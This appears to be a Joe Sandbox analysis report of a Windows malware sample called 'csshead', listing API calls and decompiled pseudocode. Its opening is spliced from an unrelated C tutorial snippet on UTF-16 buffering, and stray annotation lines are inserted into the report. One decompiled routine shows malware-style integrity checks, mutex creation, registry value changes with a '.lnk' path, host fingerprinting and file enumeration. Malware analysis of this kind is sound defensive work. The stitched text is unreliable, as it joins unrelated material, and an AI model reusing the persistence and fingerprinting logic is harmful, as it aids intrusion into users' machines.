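/* Scenario 3: 1281 UTF-16 newlines; 1280 (4 bytes each) fill one chunk. */
result_t demo_utf16_chunked(void) {
    static uint16_t in[1281];
    sink_t s;
    memset(&s, 0, sizeof s);
    for (size_t i = 0; i < 1281; i++) in[i] = 0x000a;
    size_t n = write_text_utf16(&s, in, sizeof in);
    return (result_t){ n, s.flushes, s.max_flush };
}
```

The thresholds are deliberately asymmetric: in the narrow loop one input byte can add two output bytes, so the check is `< 0x13ff`; in the UTF-16 loop one unit can add four, so it is `< 0x13fe`. Both leave the buffer at exactly 0x1400 bytes in the worst case, which is why the listing never checks for overflow inside the loop.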
    • Instruction address map for the listing above (per-line addresses from the Joe Sandbox IDA Plugin): 0x0042d421 to 0x0042db1d

    APIs
    • __getptd.LIBCMT ref: 0042D513
      • Part of subcall function 00425EEB: __amsg_exit.LIBCMT ref: 00425EFB
    • GetConsoleMode.KERNEL32(00000000,?,00000000,00000001,00000000,?,0042DBB3,00000000,00422655,?,0043D088,00000010,00424FBB,00422655,00000000,00000001), ref: 0042D531
    • GetConsoleCP.KERNEL32(?,0042DBB3,00000000,00422655,?,0043D088,00000010,00424FBB,00422655,00000000,00000001,00000000,00000000,00000000), ref: 0042D551
      • Part of subcall function 0042DE77: __isleadbyte_l.LIBCMT ref: 0042DE81
    • __Stoull.NTSTC_LIBCMT ref: 0042D5EB
    • __Stoull.NTSTC_LIBCMT ref: 0042D60F
    • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00422655,00000005,00000000,00000000), ref: 0042D641
    • WriteFile.KERNEL32(00000000,00422655,00000000,?,00000000), ref: 0042D66A
    • WriteFile.KERNEL32(00000000,00422655,00000001,?,00000000), ref: 0042D6C3
      • Part of subcall function 00430224: ___initconout.LIBCMT ref: 00430233
      • Part of subcall function 00430224: WriteConsoleW.KERNEL32(FFFFFFFE,00000000,00000001,00000000,00000000,00000000,?,0042D72B,?), ref: 00430256
    • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0042D831
    • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0042D90B
    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,00000D55,00000000,00000000), ref: 0042D9DB
    • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0042DA0C
    • GetLastError.KERNEL32 ref: 0042DA22
    • WriteFile.KERNEL32(00000000,?,?,?,00000000,00000000,00000001,00000000,?,0042DBB3,00000000,00422655,?,0043D088,00000010,00424FBB), ref: 0042DA63
    • GetLastError.KERNEL32(?,0042DBB3,00000000,00422655,?,0043D088,00000010,00424FBB,00422655,00000000,00000001,00000000,00000000,00000000), ref: 0042DA82
      • Part of subcall function 00429814: IsDebuggerPresent.KERNEL32 ref: 0042FAF6
      • Part of subcall function 00429814: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0042FB0B
      • Part of subcall function 00429814: UnhandledExceptionFilter.KERNEL32(06D), ref: 0042FB16
      • Part of subcall function 00429814: GetCurrentProcess.KERNEL32 ref: 0042FB32
      • Part of subcall function 00429814: TerminateProcess.KERNEL32(00000000), ref: 0042FB39
      • Part of subcall function 0042D2B2: SetFilePointer.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?,?,?,0042D4F4,00000000,00000000,00000000,00000002,00000000,00000001), ref: 0042D2F4
      • Part of subcall function 0042D2B2: GetLastError.KERNEL32(?,0042D4F4,00000000,00000000,00000000,00000002,00000000,00000001,00000000,?,0042DBB3,00000000,00422655,?,0043D088,00000010), ref: 0042D301
    Memory Dump Source
    • Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
    • Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
    • Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
    • Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
    • Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_1_400000_csshead.jbxd
    APIs
      • Part of subcall function 00410C90: GetVersionExA.KERNEL32(?,00000000,00000090), ref: 00410CBD
    • CreatePopupMenu.USER32 ref: 00418C34
    • GetClientRect.USER32(?,?), ref: 00418C58
    • GetMenuItemCount.USER32(?), ref: 00418CE3
    • AppendMenuA.USER32(?,00000800,00000000,00000000), ref: 00418CFF
    • AppendMenuA.USER32(?,00000000,?,00433984), ref: 00418E6B
      • Part of subcall function 00410D10: GetVersionExA.KERNEL32(?), ref: 00410D4A
    • GetMenuItemInfoA.USER32 ref: 00418D6D
    • AppendMenuA.USER32(?,00000000,00000014,?), ref: 00418D8D
    • SendMessageA.USER32 ref: 00418DFB
    • LoadStringA.USER32(00442B94,?,?,000000C8), ref: 00418E2E
    • GetMenuItemCount.USER32(?), ref: 00418E87
    • DestroyMenu.USER32(?), ref: 00418E96
    • MessageBeep.USER32(000000FF), ref: 00418E9E
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • CallWindowProcA.USER32(?,?,?,?,?), ref: 00412EFD
    • GetWindowRect.USER32(?,?), ref: 00412F42
    • SetRect.USER32(?,00000000,00000000,?,?), ref: 00412F69
    • FillRect.USER32(00000000,?,00000005), ref: 00412FB0
    • SetRect.USER32(?,?,?,?,?), ref: 00413009
    • DrawIconEx.USER32(00000000,?,?,?,?,?,00000000,00000000,00000003), ref: 00413035
    • SetRect.USER32(?,?,00000000,?,?), ref: 0041304D
    • GetViewportOrgEx.GDI32(00000000,?), ref: 00413077
    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00413090
    • OffsetRect.USER32(?,?,00000000), ref: 004130A6
    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 004130CB
    • OffsetRect.USER32(?,?,00000000), ref: 004130DF
    • FillRect.USER32(00000000,?,00000005), ref: 00413107
      • Part of subcall function 00411330: SetRect.USER32(?,00000000,?,?,?), ref: 00411382
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    C-Code - Quality: 100%
    			E004156C0(void* __ecx, intOrPtr _a8, long* _a16) {
    				signed char _t65;
    				signed int _t71;
    				signed int _t73;
    				signed int _t75;
    				struct HWND__* _t76;
    				struct HWND__* _t81;
    				int _t84;
    				signed char _t85;
    				int _t93;
    				long* _t97;
    				long _t98;
    				signed char _t104;
    				intOrPtr _t108;
    				signed int _t121;
    				signed int _t123;
    				void* _t125;
    				intOrPtr _t126;
    
    				_t97 = _a16;
    				_t126 = _a8;
    				_t125 = __ecx;
    				 *_t97 = 0;
    				if(_t126 != 0x1b) { // 0x1b = VK_ESCAPE
    					if(_t126 == 0xd || _t126 == 0x26 || _t126 == 0x28) { // 0xd = VK_RETURN, 0x26 = VK_UP, 0x28 = VK_DOWN
    						L42:
    						if(( *(_t125 + 0x84) & 0x00000001) != 0 || GetFocus() !=  *(_t125 + 4) || IsWindow( *(_t125 + 0x5c)) == 0 || SendMessageA( *(_t125 + 4), 0x447, 0, 0) == 0xffffffff) { // 0x447 = TB_GETHOTITEM (WM_USER+71), -1 = no hot toolbar item
    							L50:
    							if(_t126 == 0xd) {
    								goto L51;
    							}
    						} else {
    							if(_t126 == 0xd) {
    								L51:
    								if(( *(_t125 + 0x84) & 0x00000001) != 0) {
    									PostMessageA( *(_t125 + 4), 0x448, 0xffffffff, 0); // 0x448 = TB_SETHOTITEM (WM_USER+72), -1 clears the hot item
    									 *(_t125 + 0x8c) = 0xffffffff;
    									L004140E0(_t125);
    								}
    							} else {
    								_t65 =  *(_t125 + 0x85);
    								if(_t65 < 0) {
    									 *(_t125 + 0x85) = _t65 & 0x0000007f;
    								} else {
    									PostMessageA( *(_t125 + 4), 0x100, 0x28, 0); // 0x100 = WM_KEYDOWN, 0x28 = VK_DOWN
    									 *(_t125 + 0x85) =  *(_t125 + 0x85) | 0x00000080;
    								}
    								goto L50;
    							}
    						}
    						goto L53;
    					} else {
    						if(_t126 == 0x25 || _t126 == 0x27) { // 0x25 = VK_LEFT, 0x27 = VK_RIGHT
    							_t104 =  *(_t125 + 0x84);
    							_t71 = ( *(_t125 + 0x85) & 0x000000ff) >> 0x00000006 & 0x00000001;
    							_t121 = (_t71 ^ 0x00000001) + (_t71 ^ 0x00000001) | 0x00000025;
    							_t73 = _t71 + _t71 | 0x00000025;
    							if((_t104 & 0x00000001) == 0 || (_t104 & 0x00000010) != 0 || _t126 == _t121 && (_t104 & 0x00000008) != 0) {
    								goto L53;
    							} else {
    								_t98 = 0;
    								if(_t126 != _t73) {
    									L23:
    									if(_t126 == _t121) {
    										_t84 = E00411530( *(_t125 + 0x88), _t125,  *(_t125 + 0x88));
    										goto L25;
    									}
    								} else {
    									_t108 =  *0x442a58; // 0x0
    									if( *((intOrPtr*)(_t108 + 8)) != 1) {
    										goto L23;
    									} else {
    										_t84 = E00411440(_t73, _t125,  *(_t125 + 0x88));
    										L25:
    										 *(_t125 + 0x8c) = _t84;
    										if(_t84 != 0xffffffff) {
    											_t98 = 1;
    										}
    									}
    								}
    								_t75 =  *((intOrPtr*)(_t125 + 0xc)) - 1;
    								if(_t75 >= 0) {
    									_t76 =  *( *((intOrPtr*)(_t125 + 8)) + _t75 * 4);
    								} else {
    									_t76 = 0;
    								}
    								if(_t98 == 0) {
    									goto L53;
    								} else {
    									PostMessageA(_t76, 0x100, 0x1b, 0); // WM_KEYDOWN, VK_ESCAPE
    									if(_t126 != _t121) {
    										L38:
    										if( *(_t125 + 0x8c) == 0xfffffffe) {
    											 *(_t125 + 0x8c) = 0xffffffff;
    											E00411630(_t125);
    										}
    										 *_a16 = 1;
    										return 0;
    									} else {
    										_t123 =  *((intOrPtr*)(_t125 + 0xc)) - 1;
    										if(_t123 < 0) {
    											goto L38;
    										} else {
    											while(_t123 >= 0 && _t123 <  *((intOrPtr*)(_t125 + 0xc))) {
    												_t81 =  *( *((intOrPtr*)(_t125 + 8)) + _t123 * 4);
    												if(_t81 != 0) {
    													PostMessageA(_t81, 0x100, 0x1b, 0);
    												}
    												_t123 = _t123 - 1;
    												if(_t123 >= 0) {
    													continue;
    												} else {
    													goto L38;
    												}
    												goto L54;
    											}
    											RaiseException(0xc000008c, 1, 0, 0); // 0xc000008c = STATUS_ARRAY_BOUNDS_EXCEEDED
    											goto L42;
    										}
    									}
    								}
    							}
    						} else {
    							goto L53;
    						}
    					}
    				} else {
    					if( *((intOrPtr*)(__ecx + 0xc)) > 1) {
    						L53:
    						return 0;
    					} else {
    						_t85 =  *((intOrPtr*)(__ecx + 0x84));
    						if((_t85 & 0x00000001) == 0 || (_t85 & 0x00000010) != 0) {
    							if(GetFocus() !=  *(_t125 + 4) || IsWindow( *(_t125 + 0x5c)) == 0) {
    								goto L53;
    							} else {
    								SendMessageA( *(_t125 + 4), 0x448, 0xffffffff, 0);
    								L004140E0(_t125);
    								 *_t97 = 1;
    								return 0;
    							}
    						} else {
    							_t93 = SendMessageA( *(__ecx + 4), 0x447, 0, 0);
    							if(_t93 == 0xffffffff) {
    								_t93 =  *(_t125 + 0x88);
    								if(_t93 == 0xffffffff) {
    									_t93 = 0;
    								}
    							}
    							SendMessageA( *(_t125 + 4), 0x448, _t93, 0);
    							 *_t97 = 1;
    							L004117C0(_t125);
    							 *(_t125 + 0x84) =  *(_t125 + 0x84) | 0x00000020;
    							 *(_t125 + 0x85) =  *(_t125 + 0x85) & 0x0000007f;
    							return 0;
    						}
    					}
    				}
    				L54:
    			}
    • Instruction address map for the listing above (per-line addresses from the Joe Sandbox IDA Plugin): 0x004156c1 to 0x0041597a

    APIs
    • SendMessageA.USER32(?,00000447,00000000,00000000), ref: 00415708
    • SendMessageA.USER32(?,00000448,00000000,00000000), ref: 00415728
      • Part of subcall function 004117C0: GetFocus.USER32 ref: 004117D2
      • Part of subcall function 004117C0: SetFocus.USER32(?), ref: 004117E2
    • GetFocus.USER32 ref: 0041574E
    • IsWindow.USER32(?), ref: 00415761
    • SendMessageA.USER32(?,00000448,000000FF,00000000), ref: 0041577C
    • RaiseException.KERNEL32(C000008C,00000001,00000000,00000000), ref: 004158D1
      • Part of subcall function 00411530: GetClientRect.USER32(?,?), ref: 00411569
      • Part of subcall function 00411530: GetMenuItemCount.USER32(?), ref: 00411573
      • Part of subcall function 00411530: SendMessageA.USER32(?,00000417,?,?), ref: 004115BD
      • Part of subcall function 00411530: SendMessageA.USER32(?,0000041D,?,?), ref: 004115E0
      • Part of subcall function 00411440: GetClientRect.USER32(?,?), ref: 00411479
      • Part of subcall function 00411440: GetMenuItemCount.USER32(?), ref: 00411498
      • Part of subcall function 00411440: SendMessageA.USER32(?,00000417,?,?), ref: 004114C6
      • Part of subcall function 00411440: SendMessageA.USER32(?,0000041D,?,?), ref: 004114E9
    • PostMessageA.USER32(?,00000100,0000001B,00000000), ref: 0041586B
    • PostMessageA.USER32(00000000,00000100,0000001B,00000000), ref: 00415894
      • Part of subcall function 00411630: GetParent.USER32(?), ref: 00411640
      • Part of subcall function 00411630: SendMessageA.USER32(00000000,0000040C,00000000,00000000), ref: 00411656
      • Part of subcall function 00411630: GetVersionExA.KERNEL32(?), ref: 0041169F
      • Part of subcall function 00411630: LoadLibraryA.KERNEL32(comctl32.dll), ref: 004116D6
      • Part of subcall function 00411630: GetProcAddress.KERNEL32(00000000,DllGetVersion), ref: 004116EF
      • Part of subcall function 00411630: FreeLibrary.KERNEL32(00000000), ref: 0041170A
      • Part of subcall function 00411630: SendMessageA.USER32(00000000,0000041D,00000000,?), ref: 0041174F
      • Part of subcall function 00411630: PostMessageA.USER32(00000000,0000042B,00000000,00000000), ref: 00411797
      • Part of subcall function 00411630: PostMessageA.USER32(?,00000100,00000028,00000000), ref: 004117AA
    • GetFocus.USER32 ref: 004158E6
    • IsWindow.USER32(?), ref: 004158F5
    • SendMessageA.USER32(?,00000447,00000000,00000000), ref: 0041590C
    • PostMessageA.USER32(?,00000100,00000028,00000000), ref: 00415933
    • PostMessageA.USER32(?,00000448,000000FF,00000000), ref: 00415961
      • Part of subcall function 004140E0: IsWindow.USER32(?), ref: 00414100
      • Part of subcall function 004140E0: IsWindow.USER32(?), ref: 00414119
      • Part of subcall function 004140E0: SetFocus.USER32(?), ref: 00414123
      • Part of subcall function 004140E0: SendMessageA.USER32 ref: 00414141
    Memory Dump Source
    • Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
    • Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
    • Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
    • Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
    • Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_1_400000_csshead.jbxd
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    C-Code - Quality: 86%
    			E00408D0C(void* __ecx, void* __edx, void* __eflags, signed int _a4) {
    				intOrPtr _v8;
    				signed int _v12;
    				signed int _v16;
    				signed int _v20;
    				signed int _v24;
    				void* _v28;
    				struct tagPOINT _v36;
    				struct _SECURITY_ATTRIBUTES _v52;
    				char _v309;
    				void* _t60;
    				signed int _t62;
    				signed char _t66;
    				CHAR* _t72;
    				intOrPtr _t128;
    				signed int _t133;
    				signed int _t139;
    				signed char _t164;
    				void* _t166;
    				void* _t171;
    				intOrPtr _t183;
    				void* _t188;
    				void* _t191;
    
    				_t191 = __eflags;
    				_t166 = __ecx;
    				 *0x40b114 = E0040458C(0);
    				E00402574(_t54 | 0xffffffff);
    				 *0x40a064 = E004044F0(_t191);
    				 *0x40a068 = E004042D4(GetCurrentProcess());
    				_t60 = E004044F0(_t191);
    				_t192 = _t60 - 0x3c;
    				if(_t60 >= 0x3c) {
    					_t62 = E004042D4(GetCurrentProcess());
    					__eflags = _t62 - 3;
    					_t2 = _t62 == 3;
    					__eflags = _t2;
    					asm("sbb eax, eax");
    					 *0x40a034 =  ~(_t62 & 0xffffff00 | _t2);
    				} else {
    					_t164 = E004041CC();
    					asm("sbb eax, eax");
    					 *0x40a034 =  ~_t164;
    				}
    				_t66 = E0040453C(GetCurrentProcess());
    				asm("sbb eax, eax");
    				 *0x40a058 =  ~_t66;
    				E004079BC(_t192);
    				_v28 = LocalAlloc(0, 0x14);
    				E00404408( &_v52, _v28);
    				_t72 =  *0x40a0d8; // 0x401cc8
    				 *0x40a054 = CreateMutexA( &_v52, 0, _t72);
    				LocalFree(_v28);
    				_t77 = _a4;
    				asm("sbb eax, eax");
    				_v12 =  ~(_a4 & 0xffffff00 |  *_t77 == 0x0000002b);
    				_t80 = _a4;
    				asm("sbb eax, eax");
    				_v16 =  ~(_a4 & 0xffffff00 |  *((char*)(_t80 + 1)) == 0x0000002b);
    				_a4 = _a4 + 2;
    				E00401B50();
    				E00408BFC();
    				E00407984();
    				E004089D4();
    				E00407A44(_t166);
    				 *0x40b408(0x40be04);
    				 *0x40b514 = E004047AC(_a4, 0x40b510);
    				_v24 = E00407304(0x40b61c);
    				asm("sbb eax, eax");
    				if( ~( ~_v24) == 0) {
    					E0040744C(0x40b61c);
    				}
    				if(_v12 != 0 || _v16 != 0) {
    					E0040471C(_a4, 0x2ee0, 0);
    				}
    				if(_v12 != 0) {
    					E00401308( &_v309, _a4);
    					 *((char*)(_t188 + E004012DC( &_v309) - 0x135)) = 0;
    					E0040133C( &_v309, ".lnk");
    					E0040471C( &_v309, 0, 0);
    					if( *0x40a034 == 0) {
    						E00404A1C(0x80000001,  &_v309);
    					} else {
    						E00404A1C(0x80000002,  &_v309);
    					}
    				}
    				asm("sbb eax, eax");
    				if( ~( ~_v12) == 0) {
    					asm("sbb eax, eax");
    					if( ~( ~_v16) == 0) {
    						_t183 =  *0x40b514; // 0x0
    						E00408CF8(_a4, _t183);
    					}
    				}
    				if(_v12 == 0 || _v24 == 0) {
    					E0040744C(0x40b61c);
    					E00408B98(0x40b518);
    					E00408B6C();
    					E00404BA0(0x40b719);
    					 *0x40b780 = E00405468();
    					 *0x40b651 = E00405468();
    					_v8 = E00403B80(5, 0x19, 0xd);
    					E00401308(0x40b752, _v8);
    					E00401440(_v8);
    					__eflags =  *0x40a034;
    					if( *0x40a034 == 0) {
    						__eflags = 0;
    						_t181 =  *0x40a260; // 0x4021a4
    						E00408064(0x80000001, 0, _t181);
    					} else {
    						_t181 =  *0x40a260; // 0x4021a4
    						E00408064(0x80000002, 0, _t181);
    					}
    					__eflags =  *0x40b621;
    					if( *0x40b621 == 0) {
    						L24:
    						asm("sbb eax, eax");
    						__eflags =  ~( ~_v12);
    						if(__eflags == 0) {
    							_t133 =  *0x40b784; // 0x0
    							__eflags = _t133 &  *0x40a070;
    							if((_t133 &  *0x40a070) != 0) {
    								__eflags =  *0x40b621 - 0x5a;
    								if( *0x40b621 > 0x5a) {
    									GetCursorPos( &_v36);
    								}
    							}
    							_t181 = 0;
    							__eflags = 0;
    							E0040471C(_a4, 0x2ee0, 0);
    						}
    						E00407474(0x40b61c, __eflags);
    						goto L30;
    					} else {
    						_t139 =  *0x40b621; // 0x0
    						_v20 = _t139;
    						__eflags = _v20;
    						if(_v20 == 0) {
    							goto L24;
    						} else {
    							goto L23;
    						}
    						do {
    							L23:
    							Sleep(0x3e8);
    							_v20 = _v20 - 1;
    							__eflags = _v20;
    						} while (_v20 != 0);
    						goto L24;
    					}
    				} else {
    					_t181 = _a4;
    					E00401308(0x40b518, _a4);
    					E00408B6C();
    					L30:
    					E004038DC(0x40be04);
    					 *0x40c380 = 0;
    					E004038EC(0x40be04);
    					_pop(_t171);
    					E00405640(0x40c384, _t171, _t181);
    					_t128 =  *0x40b64d; // 0x0
    					 *0x40c355 = _t128;
    					E00401308(0x40c254, 0x40b625);
    					E004084A4();
    					_push(0);
    					return RtlExitUserThread();
    				}
    			}

    APIs
      • Part of subcall function 004044F0: GetVersionExA.KERNEL32(0000009C), ref: 0040451A
    • GetCurrentProcess.KERNEL32 ref: 00408D33
      • Part of subcall function 004042D4: OpenProcessToken.ADVAPI32(?,00000008,?), ref: 004042EC
      • Part of subcall function 004042D4: GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 0040430E
      • Part of subcall function 004042D4: GetLastError.KERNEL32 ref: 00404322
      • Part of subcall function 004042D4: GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,?,?), ref: 00404358
      • Part of subcall function 004042D4: GetSidSubAuthorityCount.ADVAPI32(?), ref: 0040436E
      • Part of subcall function 004042D4: GetSidSubAuthority.ADVAPI32(?,?), ref: 00404393
      • Part of subcall function 004042D4: CloseHandle.KERNEL32(?), ref: 004043F3
    • GetCurrentProcess.KERNEL32 ref: 00408D5D
    • GetCurrentProcess.KERNEL32 ref: 00408D77
      • Part of subcall function 0040453C: GetCurrentProcess.KERNEL32 ref: 00404555
      • Part of subcall function 0040453C: IsWow64Process.KERNEL32(00000000,?), ref: 0040456F
      • Part of subcall function 004079BC: RtlInitializeCriticalSection.NTDLL(0040BE04), ref: 00407A14
      • Part of subcall function 004079BC: RtlInitializeCriticalSection.NTDLL(0040C234), ref: 00407A2E
    • LocalAlloc.KERNEL32(00000000,00000014), ref: 00408D94
      • Part of subcall function 00404408: InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 0040441F
      • Part of subcall function 00404408: SetSecurityDescriptorDacl.ADVAPI32(?,000000FF,00000000,00000000), ref: 00404437
      • Part of subcall function 00404408: ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(00401CB4,00000001,?,00000000), ref: 00404453
      • Part of subcall function 00404408: GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?), ref: 00404478
      • Part of subcall function 00404408: SetSecurityDescriptorSacl.ADVAPI32(?,?,?,?), ref: 00404498
      • Part of subcall function 00404408: LocalFree.KERNEL32(?), ref: 004044AC
    • CreateMutexA.KERNEL32(?,00000000,00401CC8), ref: 00408DB4
    • LocalFree.KERNEL32(?), ref: 00408DC3
      • Part of subcall function 00408BFC: RegOpenKeyExA.ADVAPI32(80000002,00402174,00000000,00020119,?), ref: 00408C1B
      • Part of subcall function 00407984: GetVolumeInformationA.KERNEL32(004021D0,00000000,00000000,0040B110,?,?,00000000,00000000), ref: 004079A5
      • Part of subcall function 004089D4: GetVolumeInformationA.KERNEL32(004021D0,00000000,00000000,?,?,?,00000000,00000000), ref: 004089F4
      • Part of subcall function 00407A44: GetModuleFileNameA.KERNEL32(00000000,?,00000401), ref: 00407A67
    • RtlInitializeCriticalSection.NTDLL(0040BE04), ref: 00408E0C
      • Part of subcall function 004047AC: CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004047D9
      • Part of subcall function 004047AC: CreateFileA.KERNELBASE(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004047FB
      • Part of subcall function 004047AC: GetFileSize.KERNEL32(?,00000000), ref: 00404810
      • Part of subcall function 004047AC: ReadFile.KERNEL32(?,?,?,?,00000000), ref: 0040483F
      • Part of subcall function 004047AC: CloseHandle.KERNEL32(?), ref: 00404849
      • Part of subcall function 00407304: RegOpenKeyExA.ADVAPI32(80000002,004021A4,00000000,000F003F,?), ref: 00407331
      • Part of subcall function 00407304: RegOpenKeyExA.ADVAPI32(80000001,004021A4,00000000,000F003F,?), ref: 00407352
      • Part of subcall function 0040471C: CreateThread.KERNEL32(00000000,00000000,Function_00004608,?,00000000,?), ref: 00404777
      • Part of subcall function 0040471C: SetThreadPriority.KERNEL32(?,000000F1), ref: 00404786
      • Part of subcall function 0040471C: CloseHandle.KERNEL32(?), ref: 00404790
      • Part of subcall function 00404A1C: RegDeleteValueA.ADVAPI32(?,?), ref: 00404A55
      • Part of subcall function 00408B98: SHGetSpecialFolderPathA.SHELL32(00000000,?,00000026,000000FF), ref: 00408BB2
      • Part of subcall function 00408B98: SHGetSpecialFolderPathA.SHELL32(00000000,?,0000001A,000000FF), ref: 00408BD6
      • Part of subcall function 00408B6C: CreateThread.KERNEL32(00000000,00000000,Function_00008AA4,00000000,00000000,?), ref: 00408B81
      • Part of subcall function 00408B6C: CloseHandle.KERNEL32(?), ref: 00408B8E
      • Part of subcall function 00404BA0: GetComputerNameA.KERNEL32(?,00000101), ref: 00404BC3
      • Part of subcall function 00404BA0: RegOpenKeyExA.ADVAPI32(80000002,00402174,00000000,00020119,?), ref: 00404C01
      • Part of subcall function 00404BA0: GetVolumeInformationA.KERNEL32(004021D0,00000000,00000000,?,?,?,00000000,00000000), ref: 00404D40
      • Part of subcall function 00405468: GetSystemTime.KERNEL32(?), ref: 00405472
      • Part of subcall function 00401440: GetProcessHeap.KERNEL32(00000000,?), ref: 0040144D
      • Part of subcall function 00401440: HeapFree.KERNEL32(00000000), ref: 00401454
      • Part of subcall function 00408064: RegOpenKeyExA.ADVAPI32(?,?,00000000,000F003F,?), ref: 0040808B
      • Part of subcall function 00408064: RegDeleteValueA.ADVAPI32(?,?), ref: 0040809D
    • Sleep.KERNEL32(000003E8), ref: 00408FC8
    • GetCursorPos.USER32(?), ref: 00409000
      • Part of subcall function 00407474: RegCreateKeyExA.ADVAPI32(80000002,004021A4,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 0040750D
      • Part of subcall function 00407474: RegCreateKeyExA.ADVAPI32(80000001,004021A4,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00407533
      • Part of subcall function 004038DC: RtlEnterCriticalSection.NTDLL(?), ref: 004038E3
      • Part of subcall function 004038EC: RtlLeaveCriticalSection.NTDLL(?), ref: 004038F3
      • Part of subcall function 00405640: SHGetSpecialFolderPathA.SHELL32(00000000,?,0000001A,000000FF), ref: 00405664
      • Part of subcall function 00405640: FindFirstFileA.KERNEL32(?,00000080), ref: 00405697
      • Part of subcall function 00405640: FindNextFileA.KERNEL32(000000FF,00000080), ref: 00405825
      • Part of subcall function 00405640: FindClose.KERNEL32(000000FF), ref: 0040583D
      • Part of subcall function 004084A4: Sleep.KERNEL32(00004E20), ref: 00408519
      • Part of subcall function 004084A4: GetTickCount.KERNEL32 ref: 004086EB
      • Part of subcall function 004084A4: Sleep.KERNEL32(00003A98), ref: 00408706
      • Part of subcall function 004084A4: RtlExitUserThread.NTDLL(00000000), ref: 00408879
      • Part of subcall function 004084A4: RtlExitUserThread.NTDLL(00000000), ref: 004088B6
      • Part of subcall function 004084A4: Sleep.KERNEL32(000003E8), ref: 0040895F
    • RtlExitUserThread.NTDLL(00000000), ref: 00409069
      • Part of subcall function 004041CC: GetCurrentThread.KERNEL32 ref: 004041DE
      • Part of subcall function 004041CC: OpenThreadToken.ADVAPI32(00000000), ref: 004041E5
      • Part of subcall function 004041CC: GetLastError.KERNEL32 ref: 004041F4
      • Part of subcall function 004041CC: GetCurrentProcess.KERNEL32 ref: 00404207
      • Part of subcall function 004041CC: OpenProcessToken.ADVAPI32(00000000), ref: 0040420E
      • Part of subcall function 004041CC: GetTokenInformation.ADVAPI32(?,00000002,?,00000400,?), ref: 00404241
      • Part of subcall function 004041CC: CloseHandle.KERNEL32(?), ref: 0040424E
      • Part of subcall function 004041CC: AllocateAndInitializeSid.ADVAPI32(0040A2A4,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00404278
      • Part of subcall function 004041CC: EqualSid.ADVAPI32(?,?), ref: 004042A2
      • Part of subcall function 004041CC: FreeSid.ADVAPI32(?), ref: 004042BE
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
    • Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
    • Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    APIs
    • IsWindow.USER32(?), ref: 00413896
    • SendMessageA.USER32(?,?,?,?), ref: 004138AE
    • GetMenuItemCount.USER32 ref: 0041392A
    • GetVersionExA.KERNEL32(?), ref: 0041396B
    • GetMenuItemInfoA.USER32(?,00000000,00000001,0000002C), ref: 0041399F
    • lstrlen.KERNEL32(?,?,00000000,00000001,0000002C), ref: 004139D2
    • SetMenuItemInfoA.USER32(?,00000000,00000001,0000002C), ref: 004139ED
    • GetMenuItemCount.USER32 ref: 00413A10
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    C-Code - Quality: 90%
    			E00411630(intOrPtr __ecx) {
    				struct _OSVERSIONINFOA _v148;
    				intOrPtr _v216;
    				signed int _v240;
    				intOrPtr _v244;
    				void* _v248;
    				char _v252;
    				char _v256;
    				char _v260;
    				char _v264;
    				char _v268;
    				struct HWND__* _v272;
    				struct HWND__* _v276;
    				intOrPtr _v280;
    				_Unknown_base(*)()* _t47;
    				void* _t50;
    				int _t51;
    				struct HWND__* _t53;
    				struct HWND__* _t61;
    				void* _t62;
    				struct HINSTANCE__* _t67;
    				void* _t69;
    				void* _t72;
